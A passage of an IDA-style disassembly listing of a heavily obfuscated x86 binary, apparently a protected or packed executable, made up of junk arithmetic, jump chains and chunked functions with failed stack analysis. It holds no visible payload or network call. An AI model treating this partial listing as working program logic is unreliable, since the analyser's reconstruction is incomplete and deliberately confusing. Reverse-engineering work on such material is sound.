; FUNCTION CHUNK AT 00440308 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004469FA SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00456D50 SIZE 00000008 BYTES

		push	ebp
		mov	ebp, edx
		xchg	ebp, [esp+4+var_4]
		push	ebx
		mov	ebx, esi
		xchg	ebx, [esp+8+var_8]
		push	4E969353h
		jmp	loc_4469FA
sub_43E8DA	endp

; ---------------------------------------------------------------------------

loc_43E8F0:				; CODE XREF: y2kk37jd:loc_440C84j
		call	sub_4526B7
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A961

loc_43E8F6:				; CODE XREF: sub_45A961+14j
		jmp	loc_447ED3
; END OF FUNCTION CHUNK	FOR sub_45A961
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453867

loc_43E8FB:				; CODE XREF: sub_453867:loc_45058Fj
		jmp	loc_452079
; END OF FUNCTION CHUNK	FOR sub_453867
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BD0D

loc_43E900:				; CODE XREF: sub_43BD0D+16977j
		add	eax, 4152C517h
		xor	eax, 43256C73h
		mov	edx, [esp+4+var_4]
		push	eax
		jmp	loc_44DE0C
; END OF FUNCTION CHUNK	FOR sub_43BD0D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_43E915:				; CODE XREF: sub_445226+13EDFj
		call	sub_45A45E

locret_43E91A:				; CODE XREF: y2kk37jd:loc_43DF12j
		retn
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------

loc_43E91B:				; CODE XREF: y2kk37jd:00447397j
		jb	loc_44B795
		rol	edx, 1Ah
		add	ebp, 629070E5h
		and	esi, 7EDCC361h
		xchg	edx, edi
		jmp	loc_45581D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4507BF

loc_43E937:				; CODE XREF: sub_4507BF+61BEj
		push	offset sub_44EAA2
		jmp	nullsub_190
; END OF FUNCTION CHUNK	FOR sub_4507BF
; ---------------------------------------------------------------------------
		push	edi
		push	1196ED15h
		pop	edi
		or	edi, 21E9FD05h
		and	edi, 25533D9Fh
		jmp	loc_44BCBF
; ---------------------------------------------------------------------------

loc_43E959:				; CODE XREF: y2kk37jd:0043D8D4j
		push	offset loc_44ECEB
		jmp	loc_43B50B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_246. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		test	edx, 0C86A98F1h
		jmp	loc_44AB37
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456809

loc_43E96F:				; CODE XREF: sub_456809:loc_44AE23j
					; sub_4562E5:loc_45760Fj
		jl	loc_448B33
		jmp	loc_45A6B4
; END OF FUNCTION CHUNK	FOR sub_456809
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_43E97A:				; CODE XREF: sub_445226:loc_453432j
		mov	eax, ds:dword_44D2A4
		push	offset sub_43BD78
		jmp	loc_44A695
; ---------------------------------------------------------------------------

loc_43E98A:				; CODE XREF: sub_445226:loc_440502j
		pushf
		jmp	loc_44FC04
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44610D

loc_43E990:				; CODE XREF: sub_44610D:loc_443621j
					; sub_44610D+114C0j
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_452F74
		jmp	loc_448A93
; END OF FUNCTION CHUNK	FOR sub_44610D
; ---------------------------------------------------------------------------

loc_43E9A1:				; DATA XREF: sub_449E69+D76Fo
		mov	eax, [eax]
		pushf
		push	esi
		push	0EC987776h
		pop	esi
		jmp	loc_453A6A
; ---------------------------------------------------------------------------
		cmp	ebp, edx
		jmp	loc_44F241
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44346B

loc_43E9B7:				; CODE XREF: sub_44346B:loc_442245j
		rol	eax, 7
		add	eax, 0CC92C5C3h
		push	ecx
		push	9FA2B67Dh
		jmp	loc_456834
; END OF FUNCTION CHUNK	FOR sub_44346B
; ---------------------------------------------------------------------------
		adc	eax, esi
		jmp	loc_4496C0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_506. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B163

loc_43E9D3:				; CODE XREF: sub_43B163+1D3FBj
		jmp	loc_44620C
; END OF FUNCTION CHUNK	FOR sub_43B163
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4411C3

loc_43E9D8:				; CODE XREF: sub_4411C3+8D93j
		jmp	loc_442396
; END OF FUNCTION CHUNK	FOR sub_4411C3
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_341. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449641

loc_43E9DE:				; CODE XREF: sub_449641+13j
		jmp	nullsub_116
; END OF FUNCTION CHUNK	FOR sub_449641
; ---------------------------------------------------------------------------
		push	0FC98A5F4h
		pop	eax
		sub	eax, 0D1C41D0Dh
		or	eax, 9C8AEAB2h
		jmp	loc_440162
; ---------------------------------------------------------------------------
		popf
		jmp	sub_4569D1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44346B

loc_43EA00:				; CODE XREF: sub_44346B-6D38j
		adc	eax, 372738C2h
		pushf

loc_43EA07:				; CODE XREF: sub_44346B:loc_43CA22j
					; y2kk37jd:loc_43CCD9j	...
		push	offset loc_44223A
		jmp	nullsub_54
; END OF FUNCTION CHUNK	FOR sub_44346B

; =============== S U B	R O U T	I N E =======================================



sub_43EA11	proc near		; DATA XREF: sub_43C638+15597o

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043B17D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004583C9 SIZE 00000008 BYTES

		push	esi

loc_43EA12:				; CODE XREF: y2kk37jd:loc_44D27Cj
		push	7EB5D73Bh
		pop	esi
		xor	esi, 0FFC1531Ah
		add	esi, 5556B47Eh
		and	esi, 6EB00231h
		sub	esi, 3B9A9BF6h
		add	esi, 0F55FDA60h
		jmp	loc_4583C9
sub_43EA11	endp


; =============== S U B	R O U T	I N E =======================================



sub_43EA3B	proc near		; DATA XREF: sub_441718+136EEo
		push	ecx
		mov	[ebp-4], eax
sub_43EA3B	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_43ED19

loc_43EA3F:				; CODE XREF: sub_43ED19:loc_4513C9j
		push	56100D7Ch
		pop	eax
		xor	eax, 0E32462CCh
		sub	eax, 0A5EAC066h

loc_43EA51:				; CODE XREF: y2kk37jd:0044081Aj
		jmp	loc_44F59F
; END OF FUNCTION CHUNK	FOR sub_43ED19
; ---------------------------------------------------------------------------

loc_43EA56:				; CODE XREF: y2kk37jd:004502E1j
		shl	edi, 4
		or	edi, edx
		jmp	loc_45B549
; ---------------------------------------------------------------------------
		push	eax
		ror	eax, 12h
		mov	ds:dword_4516AC, eax
		retn
; ---------------------------------------------------------------------------

loc_43EA6B:				; CODE XREF: y2kk37jd:00454C62j
		jmp	locret_4529CA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457524

loc_43EA70:				; CODE XREF: sub_457524-1A31Aj
		jmp	loc_442D45
; END OF FUNCTION CHUNK	FOR sub_457524
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453867

loc_43EA75:				; CODE XREF: sub_453867-7C16j
		jnb	loc_4572EB

loc_43EA7B:				; CODE XREF: sub_453867:loc_43B6F2j
		push	ecx
		call	sub_43DD0E

loc_43EA81:				; CODE XREF: sub_44610D+140B1j
		jmp	loc_44CB3F
; END OF FUNCTION CHUNK	FOR sub_453867
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CB44

loc_43EA86:				; CODE XREF: sub_43CB44+7j
		jmp	loc_445407
; END OF FUNCTION CHUNK	FOR sub_43CB44

; =============== S U B	R O U T	I N E =======================================



sub_43EA8B	proc near		; CODE XREF: sub_45596A-C972p
					; y2kk37jd:0044D093j
		xchg	edx, [esp+0]
		pop	edx
		ror	eax, 16h
		mov	ds:dword_4516DC, eax
		retn
sub_43EA8B	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45596A

loc_43EA99:				; CODE XREF: sub_45596A-172BDj
					; y2kk37jd:00450596j
		rol	eax, 16h
		push	eax
		jmp	sub_43F3BF
; END OF FUNCTION CHUNK	FOR sub_45596A
; ---------------------------------------------------------------------------

loc_43EAA2:				; CODE XREF: y2kk37jd:loc_4525FDj
		sub	ebp, 5F5FAAB5h

; =============== S U B	R O U T	I N E =======================================



sub_43EAA8	proc near		; CODE XREF: sub_44CC31:loc_44AED0p

; FUNCTION CHUNK AT 0043B74E SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00444A1F SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044DF12 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00452094 SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		mov	eax, 9
		call	sub_43BD49

loc_43EAB6:				; CODE XREF: sub_457DD3-68Dj
		jmp	loc_44DF12
sub_43EAA8	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45833C

loc_43EABB:				; CODE XREF: sub_45833C-1A3CAj
		jmp	loc_447FF3
; END OF FUNCTION CHUNK	FOR sub_45833C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44113A

loc_43EAC0:				; CODE XREF: sub_44113A+14C7Aj
		ror	esi, 0Bh

loc_43EAC3:				; CODE XREF: sub_44113A:loc_459B64j
		push	eax
		lea	eax, loc_4431A9+3
		push	eax
		push	edi
		mov	edi, ebx
		xchg	edi, [esp+0Ch+var_C]
		jmp	loc_442818
; END OF FUNCTION CHUNK	FOR sub_44113A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C851

loc_43EAD6:				; CODE XREF: sub_43C851:loc_4436E2j
		jz	loc_449CAA
		jmp	loc_44685C
; END OF FUNCTION CHUNK	FOR sub_43C851
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442DDC

loc_43EAE1:				; CODE XREF: sub_442DDC+CDEAj
		jge	loc_44F0B3

loc_43EAE7:				; CODE XREF: sub_445568+AEE2j
		jmp	loc_444163
; END OF FUNCTION CHUNK	FOR sub_442DDC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BF31

loc_43EAEC:				; CODE XREF: sub_43BF31+13CA2j
		jmp	nullsub_376
; END OF FUNCTION CHUNK	FOR sub_43BF31
; ---------------------------------------------------------------------------

loc_43EAF1:				; CODE XREF: y2kk37jd:0043C16Cj
		jmp	loc_45394A
; ---------------------------------------------------------------------------
		sbb	ebp, ecx
		xchg	edi, eax
		or	edi, esi
		jmp	loc_44F0B1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C0B8

loc_43EB01:				; CODE XREF: sub_43C0B8+11j
		jnz	locret_43EB0C

loc_43EB07:				; CODE XREF: sub_43C0B8+4j
		call	sub_43EB1C

locret_43EB0C:				; CODE XREF: sub_43C0B8:loc_43EB01j
		retn
; END OF FUNCTION CHUNK	FOR sub_43C0B8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457986

loc_43EB0D:				; CODE XREF: sub_457986+Cj
		jmp	loc_4584D5
; END OF FUNCTION CHUNK	FOR sub_457986
; ---------------------------------------------------------------------------

loc_43EB12:				; CODE XREF: y2kk37jd:0044F0CCj
		jmp	loc_43E5C5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EF4F

loc_43EB17:				; CODE XREF: sub_43EF4F+4319j
		jmp	loc_444A52
; END OF FUNCTION CHUNK	FOR sub_43EF4F

; =============== S U B	R O U T	I N E =======================================



sub_43EB1C	proc near		; CODE XREF: sub_43C0B8:loc_43EB07p
		push	ebx
		push	offset loc_440ADE
		jmp	nullsub_27
sub_43EB1C	endp

; ---------------------------------------------------------------------------

loc_43EB27:				; CODE XREF: y2kk37jd:0044A46Fj
		cmp	dword ptr [ebp-8], 0
		jz	loc_45471E
		jmp	loc_44C97D
; ---------------------------------------------------------------------------
		xchg	ebp, [ebx]
		jmp	sub_44B0D0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_426. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45921B

loc_43EB3E:				; CODE XREF: sub_45921B+248Dj
		push	offset sub_43D7C7
		jmp	nullsub_387
; END OF FUNCTION CHUNK	FOR sub_45921B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CF09

loc_43EB48:				; CODE XREF: sub_44CF09-3E07j
					; sub_44CF09:loc_450127j
		push	0BB0D3F33h
		pop	eax
		or	eax, ds:4000F3h
		rol	eax, 15h
		jmp	loc_441B2D
; END OF FUNCTION CHUNK	FOR sub_44CF09
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459158

loc_43EB5C:				; CODE XREF: sub_459158:loc_446640j
		xchg	edi, [esp+0]
		mov	[ebp+var_4], eax
		call	sub_44CA8F
		call	sub_45877C
		test	al, al
		jz	loc_44A86A
		jmp	loc_456921
; END OF FUNCTION CHUNK	FOR sub_459158
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4424B0

loc_43EB79:				; CODE XREF: sub_4424B0+177A8j
		xchg	eax, [esp+0]
		mov	edx, eax
; END OF FUNCTION CHUNK	FOR sub_4424B0
; START	OF FUNCTION CHUNK FOR sub_43ED86

loc_43EB7E:				; CODE XREF: sub_43ED86:loc_44B95Fj
		pop	eax
		xor	edx, 7A5B1761h
		and	edx, 75E5E6B2h
		jmp	loc_441569
; END OF FUNCTION CHUNK	FOR sub_43ED86
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447F91

loc_43EB90:				; CODE XREF: sub_447F91:loc_4500A7j
		mov	eax, [esp+0]
		push	edx
		push	offset loc_43D9C6
		jmp	nullsub_96
; END OF FUNCTION CHUNK	FOR sub_447F91
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DE8B

loc_43EB9E:				; CODE XREF: sub_458A36-17704j
					; sub_43DE8B+10A3Dj
		rol	eax, 0Ch
		call	sub_454B3F

loc_43EBA6:				; CODE XREF: sub_442829-6D9Cj
		jmp	loc_457E93
; END OF FUNCTION CHUNK	FOR sub_43DE8B

; =============== S U B	R O U T	I N E =======================================



sub_43EBAB	proc near		; DATA XREF: sub_44AC89+3A5Do
		add	esp, 4
		call	sub_4569D1
sub_43EBAB	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_43C335

loc_43EBB3:				; CODE XREF: sub_43C335+1BD8Bj
		jmp	loc_447958
; END OF FUNCTION CHUNK	FOR sub_43C335
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452884

loc_43EBB8:				; CODE XREF: sub_452884+Ej
		jmp	loc_44806C
; END OF FUNCTION CHUNK	FOR sub_452884
; ---------------------------------------------------------------------------

loc_43EBBD:				; CODE XREF: y2kk37jd:loc_45C59Cj
		or	eax, 0E4BCD97Bh
		sub	eax, ds:4000EAh
		rol	eax, 1Dh
		xor	eax, 7851082Fh
		add	eax, ebp
		jmp	loc_44BB36
; ---------------------------------------------------------------------------

loc_43EBD9:				; DATA XREF: y2kk37jd:0045C510o
		mov	eax, [esp]
		push	ebx
		mov	ebx, edx
		xchg	ebx, [esp]
		jmp	loc_4501EC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443DB8

loc_43EBE7:				; CODE XREF: sub_443DB8+9j
		push	edi
		push	4A8D354Bh
		pop	edi
		add	edi, 89D07AF5h
		jmp	loc_453132
; END OF FUNCTION CHUNK	FOR sub_443DB8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_43EBF9:				; CODE XREF: sub_4448E2+3089j
		jp	loc_45BE84
		test	eax, 0ADCFCE3Eh
		jmp	loc_4528EF
; END OF FUNCTION CHUNK	FOR sub_4448E2

; =============== S U B	R O U T	I N E =======================================



sub_43EC0A	proc near		; DATA XREF: sub_43E25A+1E119o

; FUNCTION CHUNK AT 0043E2A9 SIZE 0000001C BYTES

		push	eax
		pop	ebx
		xchg	ebx, [esp+0]
		ror	eax, 0Eh
		push	esi
		push	5C871F45h
		pop	esi
		and	esi, 0F10D9F97h
		jmp	loc_43E2A9
sub_43EC0A	endp

; ---------------------------------------------------------------------------
		cmp	dword ptr [ebp-8], 0
		jz	loc_44CAC5
		jmp	loc_4561E0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F8B8

loc_43EC33:				; CODE XREF: sub_43F8B8:loc_44D2F1j
		call	sub_43D3EB
		jmp	loc_4576B2
; END OF FUNCTION CHUNK	FOR sub_43F8B8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44314E

loc_43EC3D:				; CODE XREF: sub_44314E+12j
					; y2kk37jd:00451DE3j
		add	eax, 0D4F432CCh
		mov	eax, [eax]
		or	eax, eax
		jnz	loc_44DCC0
		jmp	loc_45C628
; END OF FUNCTION CHUNK	FOR sub_44314E
; ---------------------------------------------------------------------------

loc_43EC52:				; CODE XREF: y2kk37jd:0044C912j
					; y2kk37jd:00450F82j
		rol	ecx, 1Fh
		jmp	loc_44A962
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B4EE

loc_43EC5A:				; CODE XREF: sub_43B4EE:loc_43F11Fj
		pop	ebp

loc_43EC5B:				; CODE XREF: y2kk37jd:0043E14Bj
		mov	eax, ds:dword_446618
		or	eax, eax
		jnz	loc_45344E
		jmp	loc_4496BB
; END OF FUNCTION CHUNK	FOR sub_43B4EE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C851

loc_43EC6E:				; CODE XREF: sub_43C851+5139j
		jnp	loc_447CE6
		push	0D000FC1h
		pop	esi
		jmp	loc_454013
; END OF FUNCTION CHUNK	FOR sub_43C851
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F346

loc_43EC7F:				; CODE XREF: sub_43F346+1CBAAj
		mov	eax, esi
		pop	esi
		xor	eax, 0EFE631A2h
		and	eax, 5CAB252Fh
		rol	eax, 0Fh
		jmp	loc_44383C
; END OF FUNCTION CHUNK	FOR sub_43F346
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45689F

loc_43EC96:				; CODE XREF: sub_45689F:loc_45A096j
		jz	loc_43C2A7
		popf
		adc	ebp, 0FE026C87h
		jno	loc_4556A4
		jz	loc_445F0F
		jmp	loc_43C2A1
; END OF FUNCTION CHUNK	FOR sub_45689F

; =============== S U B	R O U T	I N E =======================================



sub_43ECB4	proc near		; DATA XREF: sub_4447FB+Co
		add	ecx, 4463CDC1h
		push	offset sub_43B850
		jmp	nullsub_463
sub_43ECB4	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B427

loc_43ECC4:				; CODE XREF: sub_43B427+18j
		jnb	loc_4513F4
		not	eax
		jmp	sub_4513F3
; END OF FUNCTION CHUNK	FOR sub_43B427
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E389

loc_43ECD1:				; CODE XREF: sub_43E389+92F8j
		and	ebx, esi
		pushf

loc_43ECD4:				; CODE XREF: sub_43E389:loc_447673j
		xor	eax, 80B19F2Ch
		push	edi
		jmp	loc_43D657
; END OF FUNCTION CHUNK	FOR sub_43E389
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4447EA

loc_43ECE0:				; CODE XREF: sub_4447EA-23A3j
		mov	eax, [esp+0]
		push	ebx
		mov	ebx, edx
		xchg	ebx, [esp+4+var_4]
		call	sub_4464B3
		jmp	loc_456520
; END OF FUNCTION CHUNK	FOR sub_4447EA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EF4F

loc_43ECF3:				; CODE XREF: sub_43EF4F-957j
		xchg	ecx, [ebp+0]
		cdq
		jmp	loc_44BBAA
; END OF FUNCTION CHUNK	FOR sub_43EF4F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442A84

loc_43ECFC:				; CODE XREF: sub_442A84-29EBj
					; sub_442A84:loc_44079Ej
		push	31A30D1Ah
		pop	eax
		xor	eax, 2C6C7E63h
		sub	eax, 6F1D41B5h
		or	eax, 2E717C8Eh
		jmp	loc_451A68
; END OF FUNCTION CHUNK	FOR sub_442A84

; =============== S U B	R O U T	I N E =======================================



sub_43ED19	proc near		; CODE XREF: y2kk37jd:00440A62j
					; sub_458FCE+2C15p

var_4		= dword	ptr -4
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043C47F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043C55D SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0043C9A8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043CB37 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0043D734 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0043DF77 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0043E1C2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043EA3F SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0043F5B8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043FE9B SIZE 00000022 BYTES
; FUNCTION CHUNK AT 0043FF29 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00440667 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00440DFD SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044173D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441B91 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044251B SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004427CA SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00442D14 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044341C SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0044356C SIZE 00000025 BYTES
; FUNCTION CHUNK AT 004437D8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443CA8 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00445854 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004464D4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00446A8A SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00446EBA SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00449C82 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00449D92 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044BA03 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044BAFE SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0044DA34 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044DE3C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E080 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044E76D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F598 SIZE 00000043 BYTES
; FUNCTION CHUNK AT 0044F66A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004500D4 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0045046F SIZE 0000001A BYTES
; FUNCTION CHUNK AT 004513C9 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004525A9 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00452A15 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00452A35 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00454607 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00454DD7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004554FF SIZE 00000009 BYTES
; FUNCTION CHUNK AT 004564CF SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00457297 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004585A3 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045973F SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0045A5F0 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 0045A9DE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045ADC3 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0045BA14 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0045BAB0 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045C141 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045C2B6 SIZE 00000014 BYTES

		xchg	edi, [esp+0]
		pop	edi
		add	eax, 1DD1703Eh
		mov	eax, [eax]
		mov	al, [eax]
		jns	loc_452A35
		jmp	loc_457297
sub_43ED19	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_43ED32	proc near		; DATA XREF: sub_440F56+Co

; FUNCTION CHUNK AT 0044D359 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044DE68 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0045ACFF SIZE 00000005 BYTES

		mov	eax, [ebp+8]
		test	byte ptr [eax-8], 80h
		jz	loc_44D35B
		inc	dword ptr [ebp-8]

loc_43ED42:				; CODE XREF: sub_43ED32+F140j
					; sub_43ED32:loc_45ACFFj
		mov	eax, [ebp-8]
		pop	ecx
		pop	ecx
		jmp	loc_44D359
sub_43ED32	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F5F8

loc_43ED4C:				; CODE XREF: sub_43F5F8:loc_458EBAj
		sub	ebx, 8E03ECA3h
		add	ebx, 0D63D45Ah
		xchg	ebx, [esp+0]
; END OF FUNCTION CHUNK	FOR sub_43F5F8
; START	OF FUNCTION CHUNK FOR sub_448DCA

loc_43ED5B:				; CODE XREF: sub_448DCA+4ADBj
		push	10h
		push	244CFD78h
		pop	eax
		sub	eax, 550FE905h
		rol	eax, 2
		jmp	loc_44D175
; END OF FUNCTION CHUNK	FOR sub_448DCA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459A7D

loc_43ED71:				; CODE XREF: sub_459A7D-15EDj
		jge	loc_44872E
		mov	[edx], eax
		jmp	loc_448729
; END OF FUNCTION CHUNK	FOR sub_459A7D

; =============== S U B	R O U T	I N E =======================================



sub_43ED7E	proc near		; DATA XREF: y2kk37jd:0044491Eo

; FUNCTION CHUNK AT 00456235 SIZE 00000005 BYTES

		mov	byte ptr [eax],	0C3h
		jmp	loc_456235
sub_43ED7E	endp


; =============== S U B	R O U T	I N E =======================================



sub_43ED86	proc near		; CODE XREF: sub_403ACE+9p
					; sub_40B64A+35p ...

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043BA39 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043EB7E SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00441569 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 004418DD SIZE 00000026 BYTES
; FUNCTION CHUNK AT 0044211B SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00442A57 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 004436DD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446BC8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447A5A SIZE 0000001A BYTES
; FUNCTION CHUNK AT 004488A7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448A98 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044A058 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044AFBE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B95F SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044C5F9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044DE41 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F1BA SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0045079C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00450835 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451B60 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 004539B9 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00453BE1 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004546DC SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004555A8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004561E5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045997E SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0045AD04 SIZE 00000011 BYTES

		js	loc_442A65
		mov	eax, ds:dword_455490
		or	eax, eax
		jnz	loc_4418DD
		jmp	loc_446BC8
sub_43ED86	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4458DD

loc_43ED9F:				; CODE XREF: sub_4458DD+822Fj
		mov	ebp, ebx
		test	edx, 24C9CF47h
		jmp	loc_44563F
; END OF FUNCTION CHUNK	FOR sub_4458DD
; ---------------------------------------------------------------------------

loc_43EDAC:				; CODE XREF: y2kk37jd:0043C3AAj
		xor	eax, ebx
		jge	loc_45AFF8
		pop	ebp
		jge	loc_458B9C
; START	OF FUNCTION CHUNK FOR sub_44FA95

loc_43EDBB:				; CODE XREF: sub_44FA95-136F9j
		add	eax, 565F7EBAh
